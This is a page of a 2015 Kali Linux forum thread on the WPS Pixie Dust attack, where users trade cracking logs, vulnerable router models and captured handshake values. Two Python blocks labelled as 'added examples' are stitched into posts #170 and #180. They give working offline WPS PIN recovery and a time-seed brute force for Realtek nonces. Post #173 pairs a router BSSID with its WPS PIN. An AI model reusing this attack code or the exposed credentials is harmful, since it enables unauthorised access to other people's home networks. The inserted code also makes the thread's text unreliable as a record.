Page 4 of 12 (results 151 to 200 of 583)

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #151
    Join Date
    2014-Oct
    Posts
    42
    Thanks soxrok2212.

  2. #152
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by aanarchyy View Post
    [P] WPS Manufacturer: ENCORE Technologies, Inc.
    [P] WPS Model Number: ENHWI-3GN3
    Ralink chipset: RT3050

    Confirmed Vulnerable.

    https://wikidevi.com/wiki/Encore_ENHWI-3GN3
    Thanks... added to the list!

  3. #153
    Join Date
    2015-Mar
    Posts
    127
    Add to the database as attack successful.
    Arris models:
    TG1672
    DG1670

    Used in the Time Warner footprint. Model not listed on wikidevi. Chipset not listed in the chip UID database.
    I would guess Ralink chipset.
    Reaver mod lists WPS manufacturer "Celeno Communication, Inc.", model "CL1800".

  4. #154
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Are you using pixiewps? Because if you use that and it says E-S1 and E-S2 = 00000000, then it's Ralink. Otherwise it's Broadcom.

  5. #155
    Join Date
    2015-Mar
    Posts
    127
    Yes, pixiewps. Ralink.
    E-S1 and E-S2 = 00000000 shown.

  6. #156
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Sweet thanks! I'll add them to the database

  7. #157
    Join Date
    2015-Mar
    Posts
    141
    TG862G seems to be a bit of a hit-or-miss, this one did not accept the "secret" pin, but was still vulnerable.

    Code:
    [P] E-Nonce: b1:55:f2:0b:09:dd:44:63:8b:f2:e1:94:d8:90:5e:e0
    [P] PKE: bd:98:1b:00:24:0a:08:96:85:92:9c:5b:21:e8:bf:7e:2e:f3:0f:6c:ea:c1:4d:85:ba:af:58:7e:63:c4:f0:92:ef:8a:90:f4:d4:5a:b0:59:33:18:ae:ac:31:9e:a0:ed:b8:16:fe:bd:9c:b6:e1:aa:0e:5a:72:c8:9d:31:89:0b:ed:1f:45:e5:34:8c:ea:74:d5:35:f4:4a:13:1d:92:81:fd:e9:4d:42:88:4b:ea:ed:ef:ff:16:aa:c0:4f:3b:8f:fe:bc:f5:e7:ec:96:7e:c7:06:4b:5a:3b:20:0a:7b:72:14:4b:75:b1:25:2e:b9:a7:41:e9:4c:67:87:07:2b:a4:7a:c6:02:c2:91:9a:60:10:d8:5e:ca:fb:87:26:b2:3f:ca:3e:94:16:3c:7c:d6:60:e1:54:11:78:78:d6:f6:95:01:10:a8:ed:11:bf:12:52:85:cc:02:77:32:2a:d3:2d:63:e3:bd:23:a1:dc:27:98:55:4c:c5:5a:ae:d4:8b:48
    [P] WPS Manufacturer: ARRIS
    [P] WPS Model Number: RT2860
    [+] Received M1 message
    [P] AuthKey: d5:c6:8d:34:3b:bf:9f:33:24:15:c4:3a:39:f7:84:73:b8:f1:1e:ea:02:fc:b2:1e:6f:65:fe:56:ac:df:8a:9d
    [+] Sending M2 message
    [P] E-Hash1: 74:d7:4f:96:17:d9:77:0e:2d:7e:d7:3b:67:a6:e1:0a:cb:ab:eb:f9:23:bd:69:a6:59:f2:ff:1d:27:c8:fc:8b
    [P] E-Hash2: f1:2e:03:65:55:9f:9c:21:73:e5:a7:4b:0a:27:ca:fe:46:d1:49:8c:c8:9b:9d:f1:17:70:61:b7:c3:8b:3d:34
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 11 seconds
    [+] WPS PIN: '56276053'
    [+] WPA PSK: 'PASSWORD_HERE'
    [+] AP SSID: 'HOME-XXXX'
    [+] Nothing done, nothing to save.
    I've still yet to come across one that accepted both pins.
    EDIT: Noticed this one had a different chipset than the others I've seen, maybe the "secret" pin is more revision or chipset specific?
    Wish I could change my nick to what it was when I was a dev on the (now very defunct) knoppix-std team...
    Last edited by aanarchyy; 2015-04-08 at 05:16.

  8. #158
    If you want to manually patch reaver yourself:

    Reaver v1.4 (Official release) #r119 ~ 2013-10-20
    Homepage: https://code.google.com/p/reaver-wps/
    Patch: http://pastebin.com/raw.php?i=mkeKYppU

    Reaver v1.5 (Community fork) #8 - 2014-01-04
    Homepage: https://code.google.com/p/reaver-wps-fork/
    Patch: http://pastebin.com/raw.php?i=gQFcBbtW
    This is a Kali-Linux support forum - not general IT/infosec help.

    Useful Commands: OS, Networking, Hardware, Wi-Fi
    Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
    Hardware: Recommended 802.11 Wireless Cards

    Documentation: http://docs.kali.org/ (Offline PDF version)
    Bugs Reporting & Tool Requests: https://bugs.kali.org/
    Kali Tool List, Versions & Man Pages: https://tools.kali.org/

  9. #159
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by g0tmi1k View Post
    If you want to manually patch reaver yourself:
    [...]
    Thank you.

    I think in the near future I might modify the program so that it won't depend on a modded version of Reaver but just on the standard one.

  10. #160
    For what it's worth, both pixiewps and the patched version of reaver have made it into the Kali repos:

    PixieWPS (New): https://bugs.kali.org/view.php?id=2203
    Reaver (Patched): https://bugs.kali.org/view.php?id=2210

  11. #161
    Join Date
    2013-Oct
    Posts
    15
    soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond...

    Another one to add to the list as vulnerable:-

    Zyxel P-2812HNU - Wikidevi here

    Code:
    [P] WPS Manufacturer: ZyXEL Technology, Corp.
    [P] WPS Model Number: V3.11(TUJ.3)
    [+] Received M1 message
    [P] AuthKey: 85:5f:fc:cb:b8:...
    [+] Sending M2 message
    [P] E-Hash1: 66:29:ae:09:ab:...
    [P] E-Hash2: 81:a4:d5:58:f3:...
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 3 seconds
    [+] WPS PIN: '37********'
    [+] WPA PSK: '**********'
    [+] AP SSID: '**********'
    [+] Nothing done, nothing to save.
    Last edited by Calamita; 2015-04-08 at 18:07.

  12. #162
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Calamita View Post
    soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond...
    [...]
    Sorry I just leave that page open because I'm constantly editing it... don't really check the chat. Thanks for posting!

  13. #163
    Join Date
    2013-Oct
    Posts
    15
    Quote Originally Posted by soxrok2212 View Post
    Sorry I just leave that page open because I'm constantly editing it... don't really check the chat. Thanks for posting!
    Ahh ok - no worries! Thanks for your hard work on this.

    I'll report back with some more vulnerable devices soon hopefully

  14. #164
    Join Date
    2015-Mar
    Posts
    4
    Why doesn't it work on Broadcoms? I thought the exploit was for Broadcoms.

    model number 123456

  15. #165
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Calamita View Post
    Ahh ok - no worries! Thanks for your hard work on this.

    I'll report back with some more vulnerable devices soon hopefully
    If you find any Realtek APs please post all the info you can about them... especially the PKe! Thanks!

  16. #166
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by soxrok2212 View Post
    If you find any Realtek AP's please post all the info you can about them.. especially the PKe! Thanks!
    Is that helping you work on that flaw you mentioned you found?

    BTW here's the one for that Encore I posted the other day

    Code:
    [P] E-Nonce: 0f:2f:e4:f3:ed:a6:74:d5:97:d6:33:b9:0b:e2:4c:21
    [P] PKE: ef:80:72:86:a3:e9:5e:11:ac:93:cf:68:2f:d6:75:ad:d1:b8:eb:b9:b4:b4:0a:2b:72:e4:f5:ca:70:76:6f:70:25:76:9a:f2:34:75:31:07:b8:24:36:2d:28:b1:8f:47:bb:d5:a5:d9:e7:6f:30:f6:ce:c5:80:55:ae:ba:0a:e9:22:67:22:b9:69:27:71:a1:8b:2d:a6:ff:55:52:de:5d:95:ff:50:e3:eb:e8:d9:a3:f8:7a:cd:d0:d2:ec:a0:ec:5f:6f:87:de:56:28:80:d5:68:c6:c3:c2:0d:55:8d:43:8a:fd:b8:5c:d0:35:0c:13:28:32:27:18:17:89:a8:4c:44:45:04:8b:1b:ba:0a:b2:c3:17:e4:80:73:00:6a:6c:fd:9b:fb:97:83:84:76:a8:22:77:fc:c3:84:78:00:76:2d:1d:74:f5:02:f6:5d:b3:d4:d5:9a:e0:df:f8:19:b3:db:6d:75:c1:3b:13:f8:b3:86:9f:a4:09:ff:82:d6:c1
    [P] WPS Manufacturer: ENCORE Technologies, Inc.
    [P] WPS Model Number: ENHWI-3GN3
    [P] AuthKey: c3:d9:55:00:ba:6c:b1:1f:fc:d1:eb:68:e1:1a:30:52:de:ef:a2:ca:ca:be:eb:78:c9:3b:df:0a:02:03:9f:e1
    [P] E-Hash1: 1b:25:bf:af:80:54:60:aa:b9:c6:22:34:2d:f7:c3:20:6b:ef:fe:09:d6:97:17:56:bb:4b:e0:38:ed:38:9a:96
    [P] E-Hash2: 62:b5:b4:d2:17:32:c8:00:33:65:2e:a1:83:8b:2b:e7:68:b3:3e:fb:76:4f:6c:5f:7e:bb:16:71:56:8e:04:ac

  17. #167
    Join Date
    2015-Mar
    Posts
    127
    Cisco Linksys RE1000 v2, vulnerable.

    E-S1, E-S2 = 00:00:00:00:00... Ralink chipset. wikidevi here
    Last edited by nuroo; 2015-04-08 at 20:48.

  18. #168
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by aanarchyy View Post
    Is that helping you work on that flaw you mentioned you found?

    BTW here's the one for that Encore I posted the other day
    [...]
    Unfortunately, thats Ralink, not Realtek. Thanks though.

    Quote Originally Posted by nuroo View Post
    Cisco Linksys RE1000 v2, vulnerable.

    E-S1, E-S2 = 00:00:00:00:00... Ralink chipset. wikidevi here
    Thanks! I'll add it now

  19. #169
    Join Date
    2013-Oct
    Posts
    15
    Will do! I saw your post on hackforums about this too. PM me your details and I'll forward any info I find to you.

  20. #170
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    This is all the info I need.

    Code:
    Authkey: 
    N1 Enrollee Nonce: 
    N2 Registrar Nonce: 
    PKe: 
    E-Hash1: 
    E-Hash2:
    Optional but extremely helpful information:
    Code:
    Router Manufacturer: 
    Router Model Name/Number: 
    Router WPS Pin:
    Last edited by soxrok2212; 2015-05-06 at 21:28.
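
    The six values in that list are exactly the inputs of the offline check. What follows is an added example, not pixiewps code and not from the post: the check in Python for the case pixiewps reports as E-S1 = E-S2 = 00000000 a few posts up (Ralink). It uses the WSC key derivation that the attack exploits (PSK1/PSK2 = first 128 bits of HMAC-SHA256(AuthKey, PIN half as ASCII); E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)) and searches each half of the PIN on its own. The AuthKey, PKE, PKR and PIN in demo() are constructed; N1/N2 are only needed upstream to derive AuthKey, which is taken as already known here.

```python
import hashlib
import hmac

# Added example, not pixiewps code. Offline Pixie-Dust PIN check for the
# case pixiewps reports as E-S1 = E-S2 = 00000000 (Ralink). Follows the WSC
# derivation: PSK1/PSK2 = HMAC-SHA256(AuthKey, PIN half as ASCII)[:16],
# E-HashN = HMAC-SHA256(AuthKey, E-SN || PSKN || PKE || PKR).


def wps_checksum_digit(first7: int) -> int:
    """Checksum (8th) digit of a WPS PIN from its first seven digits."""
    acc = 0
    for i, d in enumerate(f"{first7:07d}"):
        acc += (3 if i % 2 == 0 else 1) * int(d)
    return (10 - acc % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(int(pin[:7]))


def psk_half(authkey: bytes, half: str) -> bytes:
    """PSK1 or PSK2: first 128 bits of HMAC-SHA256 over the ASCII PIN half."""
    return hmac.new(authkey, half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1 / E-Hash2 as the enrollee computes them for M3."""
    return hmac.new(authkey, e_s + psk + pke + pkr, hashlib.sha256).digest()


def pixie_recover_pin(authkey, pke, pkr, e_hash1, e_hash2,
                      e_s1=bytes(16), e_s2=bytes(16)):
    """Recover the PIN offline. Each half costs at most 10^4 HMACs because the
    two E-Hash values commit to the halves separately. Returns None when no
    half matches, which is what you get when the E-S1/E-S2 guess is wrong
    (e.g. a Broadcom AP that does not use zero secret nonces)."""
    first = None
    for h in range(10000):
        if e_hash(authkey, e_s1, psk_half(authkey, f"{h:04d}"), pke, pkr) == e_hash1:
            first = h
            break
    if first is None:
        return None
    # Only 1000 of the 10^4 second halves give a checksum-valid PIN; try those
    # first, but fall through to the rest because some APs ignore the checksum.
    order = sorted(range(10000),
                   key=lambda s: s % 10 != wps_checksum_digit(first * 1000 + s // 10))
    for s in order:
        if e_hash(authkey, e_s2, psk_half(authkey, f"{s:04d}"), pke, pkr) == e_hash2:
            return f"{first:04d}{s:04d}"
    return None


def demo() -> str:
    """Constructed data: a fake AuthKey, 192-byte PKE/PKR and the PIN 12345670,
    with zero E-S1/E-S2 as on the Ralink APs reported in the thread."""
    authkey = hashlib.sha256(b"constructed authkey").digest()
    pke = bytes((7 * i + 3) & 0xFF for i in range(192))
    pkr = bytes((5 * i + 11) & 0xFF for i in range(192))
    pin, zero = "12345670", bytes(16)
    eh1 = e_hash(authkey, zero, psk_half(authkey, pin[:4]), pke, pkr)
    eh2 = e_hash(authkey, zero, psk_half(authkey, pin[4:]), pke, pkr)
    return pixie_recover_pin(authkey, pke, pkr, eh1, eh2)


if __name__ == "__main__":
    print("recovered PIN:", demo())
```

    For a real capture, feed the AuthKey, PKE, PKR and E-Hash values printed by the modded reaver (colons stripped, via bytes.fromhex) and, for an AP whose secret nonces are not zero, substitute your E-S1/E-S2 candidates for the zero defaults.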

  21. #171
    Join Date
    2015-Mar
    Posts
    141
    ****, sorry. Didn't even notice...

  22. #172
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Quote Originally Posted by soxrok2212 View Post
    This is all the info I need.


    Optional but extremely helpful information:
    The first 3 sets of the BSSID could be very useful as a quick ID chart. It's not included for most models on the wikidevi.
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  23. #173
    Join Date
    2014-Oct
    Posts
    42
    14:CF:E2:AC:E7:50
    Manufacturer: Celeno Communication, Inc.
    Model Number: CL1800
    WPS Pin: 28944294
    Vulnerable!

  24. #174
    Join Date
    2013-Sep
    Posts
    264
    We need to know the model of the chipset (the chipset model shown in the probes).
    Thanks for your collaboration.

  25. #175
    Join Date
    2014-Oct
    Posts
    42
    Quote Originally Posted by kcdtv View Post
    we need to know : model of chipset
    model of chipset shown in the probes
    thanks for your collaboration
    In the cases where reaver is only giving this Manufacturer: Celeno Communication, Inc. and Model Number: CL1800, where in Wireshark could I get more info on the device itself?

  26. #176
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Probe request or M1 message in a WPS exchange.

  27. #177
    Join Date
    2015-Mar
    Posts
    141
    Check your messages, soxrok2212

  28. #178
    Join Date
    2014-Nov
    Posts
    7
    How do I make the reaver (forked) spill out the PKR too?

  29. #179
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    We weren't able to find where in reaver the PKR is debugged. It's probably in there somewhere but we just use small DH keys because the value is always 2. If you really need it without small DH keys, just look in the M2 message with Wireshark... "Public Key"

  30. #180
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    So many of you probably know that I was looking into Realtek recently, and I noticed some fishy stuff that they do. First of all, Realtek APs ALL generated the SAME PKe. Not just on 1 occasion, not just on 1 AP, but multiple. All generated the same PKe. This seemed very strange and insecure. A person could find the secret number used in the DH key exchange and this could be used for a MITM attack for instance, but it is not the actual problem.

    Anyways, I contacted Dominique, sent him some test data from a Realtek AP, a firmware blablabla, and he came back to me with the conclusion that Realtek can be cracked in 2 different, but similar ways.

    1- Assuming the attacker does a WPS exchange in 1 second, E-S1 = E-S2 = N1 Enrollee Nonce
    Wow, stupid engineering right? The actual PRNG is found here: https://github.com/skristiansson/uCl...lib/random_r.c
    The seed that this generator uses is the time. So assuming everything happens in 1 second, your E-S1 and E-S2 will equal the N1 Enrollee Nonce.

    2- If your exchange doesn't happen within 1 second, you can simply brute force the seed for the PRNG (kinda similar to Broadcom). All you have to do is input different times. Then, you will have E-S1 and E-S2.

    Amazing. And they thought this was a secure implementation? Nope.

    The only drawback for this attack is you can't use small PKr DH keys, so at the moment you need Wireshark or just do a hex dump to get the PKr. Not that big of a deal though. Wiire updated pixiewps within about 10 minutes of me telling him all the info and has already released it, what a champ!
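
    The two cases in that post, as an added example that is not part of the post and not pixiewps code: a Python re-implementation of the uClibc/glibc random() generator (random_r.c, the TYPE_3 additive-feedback generator) as a pure function of the seed, the seed brute force over a window of epoch seconds, and the E-S1/E-S2 candidates that follow from it. Only two facts are taken from the post: the seed is the time, and E-S1 = E-S2 = N1 when everything happens within the same second. How a 16-byte value is built from the 32-bit outputs (first four outputs, big-endian), that the AP re-seeds before each value, and the window size are assumptions of this example; the seed in the demo is constructed.

```python
# Added example, not pixiewps code and not from the post above. Models the
# two Realtek cases: re-implements the uClibc/glibc random() generator
# (random_r.c, TYPE_3 additive feedback) as a pure function of the seed,
# recovers the time seed from N1 by brute force, and derives E-S1/E-S2
# candidates. ASSUMPTIONS of this example: each 16-byte value is the first
# four 32-bit outputs after srandom(seed), big-endian, and the AP re-seeds
# with the current epoch second before each value. Only "seed is the time"
# and "E-S1 = E-S2 = N1 within the same second" come from the post.


def glibc_random_seq(seed: int, n: int) -> list:
    """First n values random() returns after srandom(seed) (glibc/uClibc TYPE_3)."""
    mask = 0xFFFFFFFF
    seed &= mask
    if seed == 0:               # srandom(0) is treated as srandom(1)
        seed = 1
    signed = seed - (1 << 32) if seed & 0x80000000 else seed
    r = [0] * (344 + n)
    r[0] = seed
    prev = signed
    for i in range(1, 31):      # Park-Miller LCG fill, result in [0, 2^31 - 1)
        prev = (16807 * prev) % 2147483647
        r[i] = prev
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344):    # the 310 warm-up outputs srandom() discards
        r[i] = (r[i - 31] + r[i - 3]) & mask
    out = []
    for i in range(344, 344 + n):
        r[i] = (r[i - 31] + r[i - 3]) & mask
        out.append(r[i] >> 1)
    return out


def value_from_seed(seed: int) -> bytes:
    """16-byte N1 / E-S1 / E-S2 under the assumed layout (four outputs, big-endian)."""
    return b"".join(w.to_bytes(4, "big") for w in glibc_random_seq(seed, 4))


def recover_seed(nonce: bytes, t_guess: int, window: int):
    """Case 2 of the post: try epoch seconds t_guess +/- window, nearest first,
    and return the one that reproduces the observed enrollee nonce (or None)."""
    for d in range(window + 1):
        for cand in sorted({t_guess - d, t_guess + d}):
            if value_from_seed(cand) == nonce:
                return cand
    return None


def es_candidates(seed: int, ahead: int = 3) -> list:
    """Case 1 (k = 0): E-S1 = E-S2 = N1. If the exchange crossed a second
    boundary the AP re-seeded later, so the next few seconds are candidates."""
    return [value_from_seed(seed + k) for k in range(ahead + 1)]


if __name__ == "__main__":
    t_ap = 1428500000                       # constructed: second the AP seeded at
    n1 = value_from_seed(t_ap)
    seed = recover_seed(n1, t_ap + 7, 60)   # attacker's clock is 7 s off
    print("N1:", n1.hex(), "recovered seed:", seed)
    for k, es in enumerate(es_candidates(seed)):
        print(f"E-S1/E-S2 candidate at +{k}s:", es.hex())
```

    Each candidate pair is then checked against E-Hash1/E-Hash2 exactly as in the zero-nonce case; if none of the seconds in the window reproduces N1, either the window is too small or the AP does not follow the assumed byte layout.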

  31. #181
    Join Date
    2014-Oct
    Posts
    44
    Quote Originally Posted by psicomantis View Post
    In the cases where reaver is only giving this Manufacturer: Celeno Communication, Inc. and Model Number: CL1800, where in wireshark could I get more info on the device itself?
    Check the FCC ID on the sticker and use an FCC ID lookup tool.
    You can find one on Google.
    Or post your FCC ID here and I'll grab it for you.

  32. #182
    Join Date
    2014-Nov
    Posts
    7
    Quote Originally Posted by soxrok2212 View Post
    We weren't alble to find where in reaver the PKR is debugged. It's probably in there somewhere but we just use small DH keys because the value is always 2. If you really need it without DH keys, just look in the m2 message with wireshark... "Public Key"
    M1, M3, M5, M7 are seen in wps_registrar.c
    M2, M4, M6, M8 are seen in wps_enrollee.c

    The PKE is in wps_process_pubkey() of wps_registrar.c, so the PKR might probably be in wps_process_pubkey() of the wps_enrollee.c file.

    Have you tested this?

  33. #183
    Join Date
    2013-Oct
    Posts
    15
    More awesome work all!

    I've not found any Realtek APs yet - which manufacturer have you gathered data from at the moment?

  34. #184
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Right now I've only tested a Belkin F9k1105v2. I had other data to try but unfortunately they used small DH keys. Somehow, small DH keys screw up Realtek cracking. Not sure why, but otherwise it does work.

  35. #185
    Join Date
    2015-Apr
    Posts
    9
    I think this one is Realtek; the wiki page shows it's Realtek, but Reaver just shows the name of the router itself.

    Here is the info:

    Authkey: d3:91:85:00:01:57:be:86:5e:52:10:fe:73:ff:ae:c1:15:0d:d3:01:99:15:67:5a:b1:ba:a0:bb:85:c3:bf:f2
    N1 Enrollee Nonce: 3a:ad:19:14:4f:5a:1d:87:1f:27:ed:1b:3c:fb:a6:18
    PKe: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    E-Hash1: 83:b9:24:05:e4:d2:60:c0:c3:15:7f:70:59:e2:e0:0c:86:54:1b:7b:81:d8:50:4c:f4:01:2e:6d:f7:3f:08:8b
    E-Hash2: 40:8c:4d:b0:82:29:32:04:6e:7e:f6:91:78:65:4d:3d:dd:9a:18:26:f7:28:1b:ff:32:0b:05:e4:a6:9b:17:f1
    PKr: 87:10:92:c3:7c:dd:9d:00:ba:80:18:16:20:d4:f4:60:d6:1e:1d:f2:fe:7f:e6:ed:c5:4d:49:c6:a1:82:4a:9b:f2:05:9f:6b:27:d6:f2:ee:24:e2:1e:12:66:d5:02:25:48:92:7e:5c:3e:9d:78:2d:b2:af:49:3b:af:4f:dd:62:e0:28:00:6b:4c:09:62:6e:c3:19:6e:e3:c2:c6:45:44:e2:50:0d:40:b9:0f:a6:cc:ae:13:0e:56:10:2a:c0:07:55:1e:db:07:ad:fc:29:ef:1a:ce:59:a9:ad:27:7d:0b:73:2b:4f:1c:17:17:de:cd:06:7c:31:34:91:e6:09:ee:97:68:67:68:66:6f:c0:05:bf:f3:a3:4e:25:1a:fd:39:a2:9a:02:86:7d:0d:4d:c1:80:b5:da:22:f7:04:1f:12:98:e4:ad:27:56:d4:49:8a:9f:1b:01:d6:39:dd:61:c2:53:09:99:0a:dd:f9:a0:fa:3b:3e:f3:7c:f3:7b:81:f3

    Router Manufacturer: Technicolor
    Router Model Name/Number: Technicolor TD5

  36. #186
    Join Date
    2015-Mar
    Posts
    127
    Wanna help. The modded reaver makes getting the necessary keys super easy. The Realtek attack needs more info than the modded reaver gives.
    Is there a tool that will extract all the needed data easily for a noob? I want to help, but I'm not sure how to use Wireshark.
    Last edited by nuroo; 2015-04-11 at 12:41.

  37. #187
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    FrankenScript could do that. I'll ask Slim to add it in the next version, if it's ok with everyone, whenever he gets back...

  38. #188
    Join Date
    2015-Mar
    Posts
    127
    Manufacturer
    Belkin International

    Model
    F9K1103

    pixiewps attack works, small DH keys used. (Good thing, can't understand Wireshark yet.)
    wikidevi here

    WI1 chip1: Ralink RT3883
    WI2 chip1: Ralink RT3092

  39. #189
    Join Date
    2015-Apr
    Posts
    39
    I'm working on a modification of reaver to automate the whole process.

    I'll post it soon.

  40. #190
    Join Date
    2015-Apr
    Posts
    39
    This is an example:

    [+] Switching mon0 to channel 9
    [?] Restore previous session for 64:70:02:535:FA? [n/Y] n
    [+] Waiting for beacon from 64:70:02:535:FA
    [+] Associated with 64:70:02:535:FA (ESSID: t6)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
    [P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91:6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:ff:24:f7:........
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3:88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:18:45:.......
    [+] Sending M2 message
    [P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
    [P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK


    I added you on Skype, soxrok2212.

  41. #191
    Join Date
    2015-Apr
    Posts
    15
    VULNERABLE:

    Model: Hitron CVE 360
    WPS Manufacturer: Ralink Technology, Corp.
    WPS Model Number: RT2860

    E-Nonce: 0e:3e:ee:d8:97:3d:a4:f1:ed:8d:b6:3a:9c:31:b2:30
    PKE: f0:bc:40:a6:c4:8f:85:eb:e0:6b:47:96:f3:7f:7c:bd:34:a2:cd:ed:c6:79:09:f7:6f:de:75:a1:b9:4c:ef:ff:0c:be:ff:81:e1:f6:6c:76:33:c7:6e:3c:58:79:36:af:71:b8:20:a9:3b:11:03:0c:b9:ef:ff:3e:d8:23:29:49:62:13:8a:ae:1c:24:74:bf:71:89:dd:b4:ea:a7:2d:eb:04:83:fd:17:d8:84:a3:b9:11:bf:63:d8:6a:56:59:4c:bd:a2:9a:44:e8:72:95:06:82:0a:af:d3:de:45:8a:ef:6d:23:ad:35:12:64:39:49:e5:ab:f1:c0:07:f8:5b:5d:00:c9:d5:39:8c:ac:79:c5:7a:40:29:fb:f5:a6:e3:c6:e5:57:cb:50:25:ce:f1:18:8c:ae:b4:25:c3:4a:c8:5b:c3:aa:76:21:53:b3:a1:19:14:c0:34:b8:61:21:67:c2:fa:7c:b1:a4:6a:8c:95:97:c3:fd:4c:26:d1:97:54:52
    AuthKey: 76:f9:c0:a7:4c:dc:7a:c5:2e:65:56:02:a6:df:0d:62:0d:9a:3f:a0:7a:d4:fb:94:af:72:4b:92:f1:26:3e:70
    E-Hash1: 4d:0d:e2:7b:b0:0e:7b:4a:15:81:a6:0a:e1:4c:91:3d:73:a2:c7:2e:30:45:69:89:0d:cb:0f:ab:97:d9:7f:f1
    E-Hash2: d7:df:23:9a:7d:20:74:80:fe:e6:1b:eb:00:19:49:43:35:8e:05:72:0f:e0:dd:5c:45:a9:a4:a5:dc:e0:09:14

    NOT VULNERABLE:

    Model: E1000 - Linksys
    Chip: Broadcom BCM4716B0 (300 MHz)

    E-Nonce: f1:04:09:09:1b:b4:a2:57:17:9a:f9:07:4b:a4:a5:70
    PKE: 96:4e:dd:2c:9e:8a:a4:4d:77:cf:e5:31:65:39:9d:08:15:c8:da:8c:33:74:37:96:eb:b1:e5:83:b2:d4:fe:79:ee:cf:8b:7f:46:f3:c8:0e:01:04:ab:0c:f6:f5:b1:d2:11:8c:ad:7a:4d:3d:b7:98:cb:75:4b:d7:37:37:01:05:a8:b4:63:49:18:e2:2f:99:52:90:4a:54:9e:98:89:e3:d1:97:11:36:a0:c8:da:9f:19:05:28:a1:5f:66:03:d4:21:a3:eb:be:b0:58:8e:8b:6b:48:c9:df:b4:a9:af:23:e5:ed:40:77:dc:c2:ee:c9:2f:c7:c7:a5:1e:79:ad:d4:34:fc:00:b3:f1:eb:6d:e9:64:6a:d7:7b:97:ea:d2:77:a3:e4:19:4b:64:00:ce:6e:7b:06:02:6c:21:11:cb:8b:a5:a2:e8:8e:8f:54:5f:c7:23:5e:08:5d:00:4a:e1:94:e0:84:0e:6d:50:d5:8b:f7:46:53:a2:32:22:cf:5a:f7
